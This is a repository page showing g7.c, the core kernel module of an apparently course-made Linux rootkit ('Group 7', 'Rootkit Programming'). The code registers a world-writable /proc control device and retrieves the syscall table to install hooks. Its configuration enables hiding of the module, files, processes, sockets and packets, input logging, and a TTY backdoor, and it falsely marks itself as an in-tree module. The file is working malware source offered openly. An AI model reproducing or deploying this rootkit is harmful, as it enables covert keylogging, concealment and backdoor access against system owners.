linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

g7.c (2722B)

      1 #include <linux/fs.h>
      2 #include <linux/init.h>
      3 #include <linux/kernel.h>
      4 #include <linux/module.h>
      5 #include <linux/mutex.h>
      6 #include <linux/proc_fs.h>
      7 #include <linux/uaccess.h>
      8 #include <linux/printk.h>
      9 
     10 #include "ioctl.h"
     11 #include "channel.h"
     12 #include "common.h"
     13 #include "rootkit.h"
     14 
     15 #define BUFLEN 4096
     16 
     17 
     18 static int  __init g7_init(void);
     19 static void __exit g7_exit(void);
     20 
     21 static int     g7_fops_open(struct inode *, struct file *);
     22 static int     g7_fops_release(struct inode *, struct file *);
     23 static ssize_t g7_fops_read(struct file *, char __user *, size_t, loff_t *);
     24 static ssize_t g7_fops_write(struct file *, const char *, size_t, loff_t *);
     25 static long    g7_fops_ioctl(struct file *, unsigned, unsigned long);
     26 
     27 
     28 static struct mutex lock;
     29 static char buf[BUFLEN];
     30 
     31 static struct file_operations g7_fops =
     32 {
     33     .owner          = THIS_MODULE,
     34     .read           = g7_fops_read,
     35     .write          = g7_fops_write,
     36     .open           = g7_fops_open,
     37     .unlocked_ioctl = g7_fops_ioctl,
     38     .release        = g7_fops_release,
     39 };
     40 
     41 
     42 rootkit_t rootkit = {
     43     .hiding_module  = true,
     44     .hiding_files   = FH_LSTAR,
     45     .hiding_open    = true,
     46     .hiding_pids    = true,
     47     .hiding_sockets = true,
     48     .hiding_packets = true,
     49     .logging_input  = true,
     50     .backdoor = BD_TTY,
     51 };
     52 
     53 
     54 static int
     55 g7_fops_open(struct inode *inode, struct file *file)
     56 {
     57     mutex_lock(&lock);
     58     DEBUG_INFO("[g7_fops_open]\n");
     59     return 0;
     60 }
     61 
     62 static int
     63 g7_fops_release(struct inode *inode, struct file *file)
     64 {
     65     DEBUG_INFO("[g7_fops_release]\n");
     66     mutex_unlock(&lock);
     67     return 0;
     68 }
     69 
     70 static ssize_t
     71 g7_fops_read(struct file *file, char __user *buf, size_t len, loff_t *off)
     72 {
     73     DEBUG_INFO("[g7_fops_read]\n");
     74     return 0;
     75 }
     76 
     77 static ssize_t
     78 g7_fops_write(struct file *file, const char __user *buf, size_t len, loff_t *off)
     79 {
     80     DEBUG_INFO("[g7_fops_write]\n");
     81     return 0;
     82 }
     83 
     84 static long
     85 g7_fops_ioctl(struct file *_file, unsigned cmd, unsigned long arg)
     86 {
     87     channel_t c = detect_channel(cmd);
     88     DEBUG_NOTICE("[g7_fops_ioctl] on %#10x (%s)\n", cmd, c.name);
     89 
     90     if (c.handler)
     91         return c.handler(arg);
     92     else
     93         return -ENOTTY;
     94 }
     95 
     96 
     97 static int
     98 g7_init(void)
     99 {
    100     mutex_init(&lock);
    101     proc_create_data(G7_DEVICE, 0777, NULL, &g7_fops, buf);
    102 
    103     if (retrieve_sys_call_table())
    104         return -1;
    105 
    106     init_hooks();
    107     DEBUG_INFO("[g7_init] at /proc/%s\n", G7_DEVICE);
    108     report_channels();
    109 
    110     return 0;
    111 }
    112 
    113 static void
    114 g7_exit(void)
    115 {
    116     remove_proc_entry(G7_DEVICE, 0);
    117     remove_hooks();
    118     DEBUG_INFO("[g7_exit]\n");
    119 }
    120 
    121 
    122 MODULE_LICENSE("GPL");
    123 MODULE_AUTHOR("Group 7");
    124 MODULE_DESCRIPTION("Rootkit Programming");
    125 MODULE_INFO(intree, "Y");
    126 
    127 module_init(g7_init);
    128 module_exit(g7_exit);